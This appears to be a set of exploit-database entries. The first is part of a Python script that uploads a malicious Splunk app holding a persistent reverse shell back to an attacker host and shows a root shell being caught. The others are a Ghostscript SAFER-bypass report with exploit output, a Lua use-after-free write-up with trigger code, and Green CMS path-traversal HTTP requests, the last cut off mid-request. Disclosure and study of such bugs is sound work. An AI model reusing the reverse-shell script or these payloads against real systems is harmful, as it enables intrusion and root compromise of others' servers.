checkLogin(current_url)
url = driver.current_url.split('/')
upload_url = url[0] + '//' + str(url[2]) + '/' + url[3] + '/manager/appinstall/_upload'
print '[*] Navigating to the uploads page ({}) ...'.format(upload_url)
driver.get(upload_url)
sleep(1)
current_url = driver.current_url
checkUrl(current_url)
form = driver.find_element_by_tag_name("form")
input = form.find_element_by_id("appfile")
input.send_keys(getcwd()+'/'+'splunk-shell.tar.gz')
force_update = driver.find_element_by_id("force")
force_update.click()
submit_button = driver.find_element_by_class_name("splButton-primary")
submit_button.click()
print '[*] Your persistent shell has been successfully uploaded!'
driver.quit()
print '[+] Preparing to catch shell ... (this may take up to 1 minute)'
system('nc -lvp {}'.format(lport))
def generatePayload(lhost, lport):
# this hex decodes into the evil splunk app (tar.gz file) that we will be uploading as the payload
# after the app is written to disk, a reverse shell is created and added to the app (it uses the user-supplied lhost and lport parameters to create the shell)
# the app configuration sets it to be enabled upon installation (restarting splunk / manually enabling it is not required.)
# this is a PERSISTENT backdoor, there is no need to re-upload multiple times... the backdoor will reconnect every 10-20 seconds
print '[*] Creating Splunk App...'
shell = '1f8b080030e9485c0003ed5b6b6fdb3614cd67fd0a221e9036ab65bd95b87b206b332c5830144bda0e705d8396689b8b446aa214271bf6df7749d9895f8993d451da95e7432c91145f87e7f25e89115952b2b3a6189124696d3d0e2c40e8fbea17b0f8abae6dd7731c3b702c1fd26dc70ead2de43f527fe6508a02e7086de59c17b7955b97ff8542ccf29ff0083fc22a50fc2ff37e0bffaee36bfe6bc10afe7196991167838db521090e6ee11fb85fe0df0bc2700b591bebc12df8caf9ef50061390245d037e0a82be4784e17e4262c3e894b46b50d13ba782420a64d99098e09245239277e13ac3d1191e92ae0109d1596fc0f35e99c5508d50859f7a6c1aeb31a7ff3e658fe103dc63fff71cdf95fb7fe885dafed78139fe535260902fdef022b8bfffe7867affaf07abf98fc900974961ca844f6f4312ec79de8dfcbbaebbc07fe078b6deffeb40a76be0282242eed839c1316aa30eda45dd17689c53f00726b772b3cf79265a82b038c53469750d7291f1bc80e7c4a528486af0312339dc32dee7f1a561341a0df4eee8f0fdc9e9c1e9e1491b9173c220334f71824a417281c48897498cfa04499703151c45d00768558c704e62744ec958b92502dabfbeb963979f7a6abf08acd6bf0a0436a4fef5fe7fe8840bfaf743dbd2faaf031d88f65a931860fadb13bccc23d2535ebd28d3ae710e6aa59c81e042d3315d23e57141531512f89ebfef04e19e65865610ec419c6f8158676b55a2bd531da1e9eebbaee35475dc51e68b66686d3b7bbe6beefb76e8dad77d95a1ceba07617c96e9d976b01f5c3f781d0e4dcd1f8e53caee5a99ebb87bd7954de2a9d6523875e7ce795635aa3bf33fa77fe803d865686ab30ee0fdfd3fcf0eb5ff5f0b6ee05f6a96461b5a06f7e7dff78240f35f076ee71f12121ac125676624c403db58e3ffbb8ee7ccf32fff3a7affaf03ad5df46a84d910bcef11b8e15986123ee408763462222448a1d247840e47456b4ce36284605f4297e021209ac266f5026181c6b07ae4af2c9b612803aebcbc5625d06ecb30a1e66359f13f060254f5b591e766172f914a5275b7d19e05292aa10f9be130e7258bdba8cc9367d33549d3614b9c8173318d525bd51aeec98ef7fa093c66666cf81c428d664e3288279085acaacedea7543aa483a54aff350c98c1d3326708366739e4c9f328e3824add5036447ca0b2b64f549de80d1fc3f4c6db73532d27a96a73923d335daddd5df50ba5d05b16f13425ac2266c093848f651b096544a067630ab3bf1353a80a5fee2019b491bca0443c979c40c03556cfa996659b55f568f2401b3553fe779332595b13e6263aab26ee2a7f92d58708e1eca5ac60a983aadfaa1be391f4d30a72515c65a2262a670720207fccd1ce352fb37d46742057da4e0ca33b83d589e627b01ac5425333839a215b72bdbd96ecacaab7225d552957d2f62ceb22ca61ca25f9a8c831131904aaac585e5d0f6e1056d95d1a8461ca214a2d1e1d063359d1a5cc0218577f56b3a316f53c3b8f4fcec6d8b9d2795dec5cd9804db333b1858e3b357c29ce8794350b9eb5edabc4ca3c06bebcaf8c8e514a7e465448614ff4a9b4cd30c405139323bfe55525956cabb6e40338fe13763e84133a648a6fc5941ca909c41a74b0aa2a048d517665405e4c3788b93eb4617a187909a39bd8fd5f207823f9fb1c2e21401ad913a316f184e7ed46e862df9f98e7993e4ef60618eb53ef90ff6f2c7cff1d8a47f800f480f7fff293b0f6ff6bc032fff2ed2e5c6cb08d75efff2dcb5e8cffbd50bfffab05dabc7eddb851ffa6bdb1361ea0ffc0d1e77f6a81d6ffd78d39fd4fe39f0db7f100ff2fb0b5ff570b56f2af3ef56fee0ce83afb6f078bf6df0f1cfdfeb7163420ec7e37f9b6587d596c74a6673cba46e3e7a3c3e3d707c7470727cd540c698cbe4729fc3d3841ead6681cfe71fafbc1abd3e65f2a6ffa64e7e3876e77f743b7fd417cfbecc7ef20f387cec77677f7795bef379f1756ea7fc327c0a5c66f3bffe1848be7bf7dc70db4feebc0acfe6dd3322da3317d912b5ff8c955408765ae3e01a2014d88612c1f198fa9a8ce8cdf7080048a387b83fd20d8b78965937ee0c5b11b39837e1085180ff62c2f8afca88ffbcefeaa63e7039c086224b84f126963e4526d42e7b429d90056ea9fb2ac2c36e700acddffc3a5f39ff080d67f1d58a5ff57ea10a6409821b512d4770c81d30cd4288f079a205211e5342bdaad96a9fe6b40ad1f33bbec1a535b004ab5c01e14243fc709b22da3b209c565a6245d322ddfcf0137e83f2617646306609dfe9d65fddbdaffaf074bfa37670dc054f56a41ac3003102ba87b8814463c256fe4d10f04f2fee6e4cdf1dbdf7eedbdfea9551568c57da311f124bea588cc96c58a111e93aae0aa625536147ceaa9d3d0d0d0d0d0d0d0d0d0d0d0d0d0d0d0d0d0f8ecf11f88a26c5b00500000'
bytes = shell.decode('hex')
f = open('splunk-shell.tar.gz','wb')
f.write(bytes)
f.close()
print '\t==> Adding reverse shell (to {}:{}) to the app...'.format(lhost,lport)
f = open('shell.py','w')
f.write('import sys,socket,os,pty\n')
f.write('ip="{}"\n'.format(lhost))
f.write('port="{}"\n'.format(lport))
f.write('s=socket.socket()\n')
f.write('s.connect((ip,int(port)))\n')
f.write('[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\n')
f.write('pty.spawn("/bin/sh")\n')
f.close()
decompress_cmd = 'tar zxvf splunk-shell.tar.gz &>/dev/null; rm splunk-shell.tar.gz'
p = Popen(decompress_cmd, shell=True, executable='/bin/bash')
p.wait()
move_cmd = 'mv shell.py splunk-shell/bin/'
p = Popen(move_cmd, shell=True, executable='/bin/bash')
p.wait()
compress_cmd = 'tar zcvf splunk-shell.tar.gz splunk-shell/ &>/dev/null; rm -r splunk-shell/'
p = Popen(compress_cmd, shell=True, executable='/bin/bash')
p.wait()
if path.isfile('splunk-shell.tar.gz'):
print '\t==> Payload Ready! (splunk-shell.tar.gz)'
def showUsage():
print '\n\tScript Usage: {} <targetUrl> <username> <password> <lhost> <lport>'.format(argv[0])
print '\tExample: {} http://192.168.4.16:8000 admin changeme 192.168.4.5 4444\n'.format(argv[0])
if len(argv) != 6:
showUsage()
exit()
if not path.isfile(gecko_driver_path):
print '\n\t[!] This program requires geckodriver, download the corresponding version for your OS from the following link:'
print '\t\t==> https://github.com/mozilla/geckodriver/releases'
print '\n\t[!] Extract the geckodriver binary, then add its full path to line 20 of this script.'
print '\t\t==> gecko_driver_path = "/tmp/geckodriver"\n'
exit()
splunk_target_url = argv[1]
splunk_admin_user = argv[2]
splunk_admin_pass = argv[3]
lhost = argv[4]
lport = argv[5]
generatePayload(lhost, lport)
exploit(splunk_target_url, splunk_admin_user, splunk_admin_pass, lport)
####################
## SCRIPT OUTPUT: ##
####################
# root@kali:~/SplunkSploit# python splunksploit.py
#
# Script Usage: splunksploit.py <targetUrl> <username> <password> <lhost> <lport>
# Example: splunksploit.py http://192.168.4.16:8000 admin changeme 192.168.4.5 4444
#
# root@kali:~/SplunkSploit# python splunksploit.py http://172.16.224.194:8000/ admin changeme 172.16.224.190 4444
# [*] Creating Splunk App...
# ==> Adding reverse shell (to 172.16.224.190:4444) to the app...
# ==> Payload Ready! (splunk-shell.tar.gz)
# [+] Starting bot ...
# [*] Loading the target page ...
# [*] Attempting to log in with the provided credentials ... Login successful!
# [*] Navigating to the uploads page (http://172.16.224.194:8000/en-US/manager/appinstall/_upload) ...
# [*] Your persistent shell has been successfully uploaded!
# [+] Preparing to catch shell ... (this may take up to 1 minute)
# Ncat: Version 7.70 ( https://nmap.org/ncat )
# Ncat: Listening on :::4444
# Ncat: Listening on 0.0.0.0:4444
# Ncat: Connection from 172.16.224.195.
# Ncat: Connection from 172.16.224.195:48902.
# # whoami
# whoami
# root
I noticed ghostscript 9.26 was released, so had a quick look and spotted some errors. For background, this is how you define a subroutine in postscript:
/hello {
(hello\n) print
} def
That's simple enough, but because a subroutine is just an executable array of commands, you need to mark it as executeonly if you're using system operators. That way, users can't peek inside and get references to operators they shouldn't be allowed to use.
/hello {
(hello\n) print
} executeonly def
That's still not enough though, because the routine might expose the contents to error handlers, so you also need to make it a pseudo-operator with odef. PostScript error handlers don't examine any deeper than the current operator (or pseudo-operator), so won't expose any of the contents if they stop.
/hello {
(hello\n) print
} executeonly odef
Looks good, but it gets weirder. If you don't bind the contents, then name resolution happens on execution, not when you define it. That means that someone can change the dictstack (which kind of works like variable scope in other languages) so that commands and operators do something different than when you defined the subroutine.
Like this:
GS>/hello {
(hello\n) print
} executeonly odef
GS><< /print { (goodbye) == pop } >> begin
GS>hello
(goodbye)
This means you also need to bind the routine, and also be very aware when you're writing it of what cannot be resolved at define-time (nobody ever said writing postscript was easy, lol). So now we have this:
/hello {
(hello\n) print
} bind executeonly odef
I think that's good enough for simple routines, but what if it's more complicated? The way you branch in PostScript is to create an ephemeral subroutine and pass it to the `if` or `ifelse` operators, like this:
/hello {
time 1200 lt {
(good morning\n) print
} {
(good afternoon\n) print
} ifelse
} bind executeonly odef
Do those ephemeral routines also need to be protected? The answer is yes, they're pushed on the operand stack just like everything else, so can cause /stackoverflow or /execstackoverflow errors, and will then be exposed to error handlers.
Ghostscript didn't protect a whole bunch of these ephemeral routines, here is one example:
1123 {
1124 currentglobal pdfdict gcheck .setglobal
1125 pdfdict /.Qqwarning_issued //true .forceput
1126 .setglobal
1127 pdfformaterror
1128 } ifelse
You can see the routine itself is bound, executeonly and odef, but the ephemeral routines inside it used for conditions and loops are not protected.
These bugs are starting to get trickier to exploit, you have to make an operator fail very precisely, but I made a demo that works in 9.26. This uses the trick I described above of taking over names that couldn't be resolved at define time by pushing a new dict on the dictstack. This gives me a high degree of control over the routine.
$ gs -dSAFER -f ghostscript-926-forceput.ps
GPL Ghostscript GIT PRERELEASE 9.27 (2018-11-20)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
(Stage 0: PDFfile)
(Stage 1: q)
(Stage 3: oget)
(Stage 4: pdfemptycount)
(Stage 5: gput)
(Stage 6: resolvestream)
(Stage 7: pdfopdict)
(Stage 8: .pdfruncontext)
(Stage 9: pdfdict)
(Stage 10: /stackoverflow)
( Last Parameter:){(\n **** Error: File has unbalanced q/Q operators \(too many q's\)\n Output may be incorrect.\n) pdfdict /.Qqwarning_issued --.knownget-- {{--pop--} {--.currentglobal-- pdfdict --scheck-- --.setglobal-- pdfdict /.Qqwarning_issued true --.forceput-- --.setglobal-- pdfformaterror} --ifelse--} {--.currentglobal-- pdfdict --scheck-- --.setglobal-- pdfdict /.Qqwarning_issued true --.forceput-- --.setglobal-- pdfformaterror} --ifelse--}
( Extracting .forceput...)
( Result:)--.forceput--
(Stage 11: Exploitation...)
( Should now have complete control over ghostscript, attempting to read /etc/passwd...)
(root:x:0:0:root:/root:/bin/bash)
(All Done)
$ tail -1 ~/.bashrc
echo pwned by postscript
This exploit should work via evince, ImageMagick, nautilus, less, gimp, gv, etc, etc. It might require some adjustment to work on older versions, because it requires precise alignment of the operand stack, but 9.26 and earlier are all affected.
p.s. I'm not regularly looking at ghostscript, this was just a random look at the new release.
#DeprecateUntrustedPostscript
################################################################################
Project Member Comment 2 by taviso@google.com, Dec 4
I noticed someone point out on twitter that the default $LESSOPEN can invoke ImageMagick:
https://twitter.com/jensvoid/status/1065948452872511488
Naturally, that works with this too (just name the exploit foo.pcd)
################################################################################
Project Member Comment 3 by taviso@google.com, Dec 4
This is ghostscript bug 700317
################################################################################
Project Member Comment 5 by taviso@google.com, Dec 12
Artifex sent me a proposed patch to review, but their patch only fixed the vulnerability for /stackoverflow. I did use /stackoverflow in the testcase, but as I mentioned in the report, any error will do.
I updated the exploit to use /typecheck instead, and sent it to them with an explanation of why the patch was insufficient.
Artifex also informed me that they plan to sit on their patch for the full 90 days, and will not commit it to git or release it. I consider this a bad faith gaming of our disclosure policy, which is astonishing for an open source company.
Ghostscript vulnerabilities have been discovered exploited in the wild in the past (e.g. http://ghostbutt.com/), sitting on exploits with patches available for months is really unacceptable. I know that Artifex commercial customers are already cc'd on the ghostscript bug tracker, which makes this even harder to stomach.
$ ./gs -dSAFER -sDEVICE=ppmraw -sOutputFile=/dev/null -f ghostscript-926-forceput-typecheck-example.ps
GPL Ghostscript GIT PRERELEASE 9.27 (2018-11-20)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
(Stage 0: PDFfile)
(Stage 1: q)
(Stage 3: oget)
(Stage 4: pdfemptycount)
(Stage 5: gput)
(Stage 6: resolvestream)
(Stage 7: pdfopdict)
(Stage 8: .pdfruncontext)
(Stage 9: pdfdict)
Stage 10: /typecheck #1
Stage 10: /typecheck #2
(Stage 11: Exploitation...)
( Should now have complete control over ghostscript, attempting to read /etc/passwd...)
(root:x:0:0:root:/root:/bin/bash)
################################################################################
Project Member Comment 6 by taviso@google.com, Dec 14
Artifex sent me a new proposed patch to review, this one changes all branches in system routines to look like this:
/blah {
{
foo
} executeonly {
bar
} executeonly ifelse
} def
That solution doesn't work, because it doesn't stop you extracting the routine, waiting for the stack to unwind then executing it outside pseudo-op context. That allows the error handler to access internals, so you just cause random errors and extract any contents you like. (I'm aware this is really getting into the postscript weeds, but basically "just" being executeonly is useless). Here is an updated exploit that works with executeonly branches.
$ ./gs -dSAFER -sDEVICE=ppmraw -sOutputFile=/dev/null -f ghostscript-926-forceput-typecheck-executeonly-example.ps
GPL Ghostscript GIT PRERELEASE 9.27 (2018-11-20)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
(Stage 0: PDFfile)
(Stage 1: q)
(Stage 3: oget)
(Stage 4: pdfemptycount)
(Stage 5: gput)
(Stage 6: resolvestream)
(Stage 7: pdfopdict)
(Stage 8: .pdfruncontext)
(Stage 9: pdfdict)
Stage 10: /typecheck #1
Stage 10: /typecheck #2
(Stage 9: pdfdict)
(Stage 9: pdfdict)
Stage 10: /typecheck #3
(Stage 11: Exploitation...)
( Should now have complete control over ghostscript, attempting to read /etc/passwd...)
(root:x:0:0:root:/root:/bin/bash)
I sent this to Artifex and explained why their solution wont work.
I *think* the branches need to be named and pseudo-ops, but that will be really ugly and I doubt Artifex will implement that, more likely they will make an interpreter change.
################################################################################
Project Member Comment 7 by taviso@google.com, Dec 17
Artifex sent me a new patch that changes how the $error dict works, instead of getting a reference to the failing operator, you get a name object (i.e. /--foo-- instead of --foo--).
I *think* this works, but if any ephemeral routine can be run in an unexpected context, it might be a security issue. Artifex says they're going to manually check for any that look dangerous, but in my opinion it will take a while to iron out all possible attack vectors.
I think this is a major change and requires some thought, even if I can't immediately think of a way to break it (other than the unexpected context thing).
Project Member Comment 8 by taviso@google.com, Jan 7
Artifex sent me a patch with more checking for abusable procedures (i.e. routines that are useful in an unexpected context), hiding some that are hard to reason about. I spent a morning double checking for any more that they had missed and found one in gs_fonts.ps:
1105 dup 3 index .fontknownget
1106 { dup /PathLoad 4 index //.putgstringcopy
1107 4 1 roll pop pop pop //true exit
1108 } if
1109
.putgstringcopy is a dangerous operator, basically just a wrapper around .forceput. I wrote a quick demo that is able to extract a reference, and mailed it to Artifex.
$ ./gs -dSAFER -sDEVICE=ppmraw -f example.ps
GPL Ghostscript GIT PRERELEASE 9.27 (2018-11-20)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
{--dup-- /PathLoad 4 --index-- --.putgstringcopy-- 4 1 --roll-- --pop-- --pop-- --pop-- true --exit--}
--.putgstringcopy--
I checked pretty thoroughly, and this is the only one I could find that they had missed - but a lot of the code is quite hard to reason about, so I'm not sure there are no more.
################################################################################
Project Member Comment 9 by taviso@google.com, Jan 8
Artifex sent me a patch that makes that executeonly, but not the containing procedures as well, so I could still make them fail.
e.g. this one in gs_fonts.ps:
1137 } executeonly
1138 if pop % Stack: origfontname fontdirectory path
1139 }
1140 if pop pop % Stack: origfontname
It doesn't matter that the inner one is executeonly, because if the outer one fails that one never gets called.
$ ./gs -dSAFER -sDEVICE=ppmraw -sOutputFile=/dev/null -f font.ps
GPL Ghostscript GIT PRERELEASE 9.27 (2018-11-20)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
.loadfont
(.fontknownget, force /typecheck)
--.forceundef-- operatortype
GS>
I sent an explanation to Artifex on why containing procedures also need to be fixed. I'm spending way too much time reviewing patches for this one bug, untrusted postscript needs to be deprecated asap.
Project Member Comment 10 by taviso@google.com, Jan 9
I got a new patchset from Artifex, this one has a set of five patches which should fix this bug. I've attached them for reference.
################################################################################
Project Member Comment 11 by taviso@google.com, Jan 9
I think this patchset seems comprehensive, in summary:
- Replaces references to operators with name objects in saved stacks for error handlers.
- Makes all ephemeral procedures that contain dangerous operators executeonly, and any outer procedures. This isn't automated, they are manually changing the postscript.
- Changes how error handlers behave in executeonly procedures so that faulting operators don't leak.
- Rewrite a lot of code so less pseudo-operators are exposed to users, especially some that are complicated and hard to reason about.
I think this will work, although it's hard to be confident they found all the transient routines - postscript is really hard to read.
Assuming they found them all, this still requires that developers don't accidentally add new branches in any of the postscript and forget to make them executeonly, which seems like a very easy mistake to make.
I asked if they would consider making dangerous operators search the estack for any non-executeonly routines, perhaps only for test runs - just to make sure future changes don't re-introduce this. Let's see what they say, it seems like a pretty simple change to me.
Project Member Comment 12 by taviso@google.com, Jan 10
Filed https://bugs.ghostscript.com/show_bug.cgi?id=700472 to cover regression tests:
-----
When bug 700317 is fixed, it will be important that any future changes to postscript resources don't introduce any new conditions or other control structures that aren't executeonly.
This seems like a really easy mistake to make, just changing an if into an ifelse, or adding another test could introduce a vulnerability.
I wonder if some of the dangerous routines, like .forceput and so on, could search the e_stack every time they're called to verify there are no non-executeonly routines on the call stack.
I suppose this is only necessary for test-cluster runs, just to make sure nobody accidentally breaks the security guarantees. Just looking at count_exec_stack() in zcontrol.c, it seems like the code would be really simple.
Just filing this enhancement request to think about this (or some other solution).
-----
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46242.zip
# Exploit Title: Lua 5.3.5
# Exploit Author: Fady Mohamed Osman (https://twitter.com/fady_othman)
# Exploit-db : http://www.exploit-db.com/author/?a=2986
# Blog : https://blog.fadyothman.com/
# Date: Jan. 10th 2019
# Vendor Homepage: https://www.lua.org/
# Software Link: https://www.lua.org/ftp/lua-5.3.5.tar.gz
# Version: 5.3.5
# CVE ID: CVE-2019-6706
During a fuzz session using "AFL", I found a heap use after free in lua
5.3.5, after analysis of the crash I found the root cause of the
vulnerability, here's the details.
The function `lua_upvaluejoin` in file lapi.c at line 1287 suffers from a
use after free bug when supplied the same function for parameter f1 and f2
and the same upvalue index, additionally I found that the bug is only
triggered when the upvalue is closed, this happens because the
`luaC_upvdeccount` function found in file lgc.c at line 678 will decrement
the refcount and then free the upvalue if the refcount is zero and if the
upvalue is closed.
See the comments below for more explanation.
--------------
LUA_API void lua_upvaluejoin (lua_State *L, int fidx1, int n1,
int fidx2, int n2) {
LClosure *f1;
UpVal **up1 = getupvalref(L, fidx1, n1, &f1);
UpVal **up2 = getupvalref(L, fidx2, n2, NULL);
luaC_upvdeccount(L, *up1); //Will delete up1
*up1 = *up2; //up1 is up2 because it's the same upvalue and now it's
freed.
(*up1)->refcount++; //up1 is freed, yet it's used here.
if (upisopen(*up1)) (*up1)->u.open.touched = 1;
luaC_upvalbarrier(L, *up1);
}
--------------
- To trigger the bug simply use a lua program like this (this one will
crash):
--
f=load(function() end)
interesting={}
interesting[0]=string.rep("A",512)
debug.upvaluejoin(f,1,f,1)
---
- Another program that will not crash (unless you compile with
-fsanitize=address):
---
function w()
local x = {}
f = function() print(x) end
end
w()
debug.upvaluejoin(f,2,f,2)
---
If you want a fix you can use the patch provided here:
http://lua.2524044.n2.nabble.com/CVE-2019-6706-use-after-free-in-lua-upvaluejoin-function-tc7685575.html
Timeline:
- Jan 10th 2019 : Vulnerability discovered and reported to lua mailing list.
- Jan 23rd 2019 : CVE Identifier obtained.
- Jan 25th 2019 : Fix is suggested by Matěj Cepl.
Refrences:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6706
https://security-tracker.debian.org/tracker/CVE-2019-6706
https://vuldb.com/?id.130228
# Exploit Title: Green CMS 2.x - Arbitrary File & Directory Download
# Dork: N/A
# Date: 2019-01-25
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.greencms.net/
# Software Link: https://codeload.github.com/GreenCMS/GreenCMS/zip/beta
# Version: 2.x
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?m=admin&c=custom&a=themeexporthandle&theme_name=[Directory]
#
# /[PATH]/Data/exploitdb-313a669df7bd2494db4b81855ad9ffb4.zip
GET /[PATH]/index.php?m=admin&c=custom&a=themeexporthandle&theme_name=../../../exploitdb HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=9kv875ue1nd30aem1r11v7j4e1; scd39=d417d5511c72c08320; token=0d74f7745ef2ae866371f379887de13b; roxyview=grid; roxyld=%2FExploitDb%2Fglfusion-1.7.6%2Fpublic_html%2Fimages; poll-20190124084438702=x; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1548345007; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1548345007; iCMS_iCMS_AUTH=23fead6b8NDfVdP8qVNpOPIPPUSpFJAso5x4PtfIdZ3nDi8o5wnWMSK3ChFfVeYSOHBG1oexoFRdZvpgU83b8Jf61eMlofgor_cA_M03jKYoXB3uVFTNACLmbQ; iCMS_USER_AUTH=219cbaebs-OpY5sJLvCCKTR3Dqt_oCHrxJW69eyU4H8ydfrP-oU2o_WTjmpI2rq_RlGfFU7z4khePqUAE_-e9BZoY7JqRmHEdQMwgIHvOFkLMuEm_MfWL5q_YjuZtjifggqF00S7XifyDwBoSSjLHF5_75serNlj4UzaM2Jx1UNECipmSjn0_LbHUxywdjrykOLebAf5KahIejKgbmJs25r1GkYT7kNAC4NCYzy8Bohr1Ty1LQpYq1D3Rid_82phOUD4q6sY3Ndaj8les5sAJvkEmXOwI8_y6lqBjZarygWlIh_O6b-nvRiE2cbaaMFsxJZZUlRvYU6RUWihB9yhFfg8UOZ9A41c_BdcyREjmQEGPPzBZnHBXZv4SbG-tj1gRr-L40L6EdGX-oKrbDC4oyt6vB0UzyzN9CZP5ZKWn8GzFGJAMWF7kFjPD_upiZiBd-rHyPyCZb0Tsr6920eRpm5ZPLiJ-cfKsR0Gm1s5vvsYO9BsTG1FogUhQwzjHbT4lIO3lUcpvxYSSc9wbE3R1izg2wME6ATQ6PEnszM; iCMS_userid=32dfb608S9QlPEJd2BZY81z70jgnBnJldGAo3OuRdbLJJbk_Qw; iCMS_nickname=32dfb608S9QlPEJd2BZY81b63296UnYxe2Yv3riRc-edc-xqFRw; ICMSSESSION=pahh0r0jsr9gre9e0vn1jmqp23; /PATH/modules/system/admin.php_SystemCustomtag_sortsel=name; /PATH/modules/system/admin.php_SystemCustomtag_ordersel=ASC; /PATH/modules/system/admin.php_limitsel=15; /PATH/modules/system/admin.php_SystemCustomtag_filtersel=default; /PATH/modules/system/admin.php_SystemPages_sortsel=page_title; /PATH/modules/system/admin.php_SystemPages_ordersel=ASC; /PATH/modules/system/admin.php_SystemPages_filtersel=default; /PATH/modules/content/admin/content.php_mod_content_Content_sortsel=content_title; /PATH/modules/content/admin/content.php_mod_content_Content_ordersel=ASC; /PATH/modules/content/admin/content.php_limitsel=15; /PATH/modules/content/admin/content.php_mod_content_Content_filtersel=default; Hm_lvt_48659a4ab85f1bcebb11d3dd3ecb6760=1548351649; Hm_lpvt_48659a4ab85f1bcebb11d3dd3ecb6760=1548355214; greencms_last_visit_page=aHR0cDovL2xvY2FsaG9zdC9leHBsb2l0ZGIvZ3JlZW5jbXMtYmV0YS9pbmRleC5waHA%2FbT1hZG1pbiZjPWluZGV4JmE9aW5kZXg%3D; greencms_post_add1=x%9Cm%901k%C30%10%85%FFJ%D0%ECPI%B5-%5B%84%2C%1D2e%EAX%85%60YgG%E0%D8%22%3A%0D%A1%F4%BF%F7%9C+%C8%90%ED%DE%BB%EF%C1%BB%FBea%89xF%8F%130%CDL%AA%AD%94%265C%0F%26%95%83%1ALR%95l%0E7%80%F9%EB%F8%CD%8A%27%DF%2F3%C2%8C%94%D8%85%FD%0A%D6%DC%A4%AAU%AE+%01%A2%5ESe%BF3%1Fa%9F%23%DE%11-%B2%8A%D8a%8A%E4%84d%27%1F%2F%D9%C7%7BX%7BD%3F%8FT%28%9Bp%0DS%87o%16K+%8Fg%E9%9E%8C%E4%A2%DDr%B1%95%E5Fr%FD%D9jYg%E2%BA8%3Fxp%AFT%B5%E1Rs%A1%C5J%F5%1DR%AB%1F%2Az%2A%18v%E3C%D0W%5Ci%E9%2B%D6U47%5C%D1%7DV%01%3B%FD%FD%03%84%F0b%FF
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Thu, 24 Jan 2019 22:45:40 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: greencms_last_visit_page=aHR0cDovL2xvY2FsaG9zdC9leHBsb2l0ZGIvZ3JlZW5jbXMtYmV0YS9pbmRleC5waHA%2FbT1hZG1pbiZjPWN1c3RvbSZhPXRoZW1lZXhwb3J0aGFuZGxlJnRoZW1lX25hbWU9Li4vLi4vLi4vZXhwbG9pdGRi; expires=Sat, 23-Feb-2019 18:45:40 GMT; Max-Age=2592000; path=/
Content-Disposition: attachment; filename="exploitdb-313a669df7bd2494db4b81855ad9ffb4.zip"
Content-Length: 128497375
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
# POC:
# 2)
# http://localhost/[PATH]/index.php?m=admin&c=media&a=downfile&id=[BASE64_FILE]
#
GET /[PATH]/index.php?m=admin&c=media&a=downfile&id=aW5kZXgucGhw HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=9kv875ue1nd30aem1r11v7j4e1; scd39=d417d5511c72c08320; token=0d74f7745ef2ae866371f379887de13b; poll-20190124084438702=x; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1548345007; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1548345007; iCMS_iCMS_AUTH=23fead6b8NDfVdP8qVNpOPIPPUSpFJAso5x4PtfIdZ3nDi8o5wnWMSK3ChFfVeYSOHBG1oexoFRdZvpgU83b8Jf61eMlofgor_cA_M03jKYoXB3uVFTNACLmbQ; iCMS_USER_AUTH=219cbaebs-OpY5sJLvCCKTR3Dqt_oCHrxJW69eyU4H8ydfrP-oU2o_WTjmpI2rq_RlGfFU7z4khePqUAE_-e9BZoY7JqRmHEdQMwgIHvOFkLMuEm_MfWL5q_YjuZtjifggqF00S7XifyDwBoSSjLHF5_75serNlj4UzaM2Jx1UNECipmSjn0_LbHUxywdjrykOLebAf5KahIejKgbmJs25r1GkYT7kNAC4NCYzy8Bohr1Ty1LQpYq1D3Rid_82phOUD4q6sY3Ndaj8les5sAJvkEmXOwI8_y6lqBjZarygWlIh_O6b-nvRiE2cbaaMFsxJZZUlRvYU6RUWihB9yhFfg8UOZ9A41c_BdcyREjmQEGPPzBZnHBXZv4SbG-tj1gRr-L40L6EdGX-oKrbDC4oyt6vB0UzyzN9CZP5ZKWn8GzFGJAMWF7kFjPD_upiZiBd-rHyPyCZb0Tsr6920eRpm5ZPLiJ-cfKsR0Gm1s5vvsYO9BsTG1FogUhQwzjHbT4lIO3lUcpvxYSSc9wbE3R1izg2wME6ATQ6PEnszM; iCMS_userid=32dfb608S9QlPEJd2BZY81z70jgnBnJldGAo3OuRdbLJJbk_Qw; iCMS_nickname=32dfb608S9QlPEJd2BZY81b63296UnYxe2Yv3riRc-edc-xqFRw; ICMSSESSION=pahh0r0jsr9gre9e0vn1jmqp23; /TARGET/modules/system/admin.php_SystemCustomtag_sortsel=name; 